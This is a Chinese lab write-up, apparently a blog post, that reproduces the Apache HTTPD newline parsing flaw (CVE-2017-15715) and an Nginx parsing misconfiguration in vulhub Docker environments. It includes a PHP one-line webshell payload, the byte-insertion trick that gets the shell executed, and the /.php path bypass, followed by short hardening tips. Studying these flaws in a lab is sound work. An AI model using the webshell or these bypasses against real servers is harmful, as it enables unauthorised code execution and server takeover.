vulhub中间件解析漏洞复现

vulhub中间件解析漏洞复现

🍉 === shell

此环境来自vulhub工程:
https://github.com/vulhub/vulhub

以下测试环境为ubuntu 20.04



Apache HTTPD 换行解析漏洞(CVE-2017-15715)

漏洞原理及环境部署

Apache HTTPD是一款HTTP服务器,它可以通过mod_php来运行PHP网页。其2.4.0~2.4.29版本中存在一个解析漏洞,在解析PHP时,xxx.php\x0A将被按照PHP后缀进行解析,导致绕过一些服务器的安全策略。

# 拉取vulhub配置
git clone https://github.com/vulhub/vulhub.git

# 切换到相应漏洞路径
cd xxx/vulhub-master/httpd/CVE-2017-15715

# docker-compose部署该漏洞环境
docker-compose up -d

文件上传

访问http://ip:8080/,只有一个文件上传框,直接上传一句话木马

GIF89a<?=eval($_POST["root"]);?>

然后抓包
请添加图片描述
打开hex表,找到shell.php哪一行,右键0d选择插入byte
请添加图片描述
写入0a,然后确定
请添加图片描述
访问shell.php%0a,确认是否能解析
请添加图片描述

蚁剑直连

请添加图片描述

加固

  • 别使用版本为2.4.0~2.4.29的Apache中间件
  • Apache源码修改(不至于,不至于…)

Nginx 解析漏洞复现

该漏洞与Nginx、php版本无关,属于用户配置不当造成的解析漏洞,在上传图片路径后加上/.php就会当成php解析

环境

# 开之前记得关80端口服务,不然可能会出现端口占用的问题
cd nginx/nginx_parsing_vulnerability/

# docker启动
docker-compose up -d

简单getshell

上传一张图片马,根据图片路径访问http://your-ip/uploadfiles/23c6161c5b4dafe8becc8e29452f00b2.jpg/.php
请添加图片描述

会发现被解析成php,蚁剑直连
请添加图片描述

  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值